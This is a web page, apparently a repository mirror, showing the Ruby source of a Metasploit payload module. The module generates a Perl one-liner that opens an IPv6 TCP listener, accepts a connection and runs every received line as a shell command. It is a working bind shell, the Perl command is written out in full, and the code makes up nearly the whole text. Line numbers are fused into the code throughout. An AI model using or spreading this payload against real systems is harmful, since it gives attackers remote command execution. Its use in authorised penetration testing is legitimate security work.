Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb
Views: 11779
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456module MetasploitModule78CachedSize = 152910include Msf::Payload::Single11include Msf::Sessions::CommandShellOptions1213def initialize(info = {})14super(merge_info(info,15'Name' => 'Unix Command Shell, Bind TCP (via perl) IPv6',16'Description' => 'Listen for a connection and spawn a command shell via perl',17'Author' => ['Samy <samy[at]samy.pl>', 'cazz'],18'License' => BSD_LICENSE,19'Platform' => 'unix',20'Arch' => ARCH_CMD,21'Handler' => Msf::Handler::BindTcp,22'Session' => Msf::Sessions::CommandShell,23'PayloadType' => 'cmd',24'RequiredCmd' => 'perl',25'Payload' =>26{27'Offsets' => { },28'Payload' => ''29}30))31register_advanced_options(32[33OptString.new('PerlPath', [true, 'The path to the Perl executable', 'perl'])34]35)36end3738#39# Constructs the payload40#41def generate(_opts = {})42vprint_good(command_string)43return super + command_string44end4546#47# Returns the command string to use for execution48#49def command_string5051cmd = "#{datastore['PerlPath']} -MIO -e '$p=fork();exit,if$p;$c=new IO::Socket::INET6(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>'"5253return cmd54end55end565758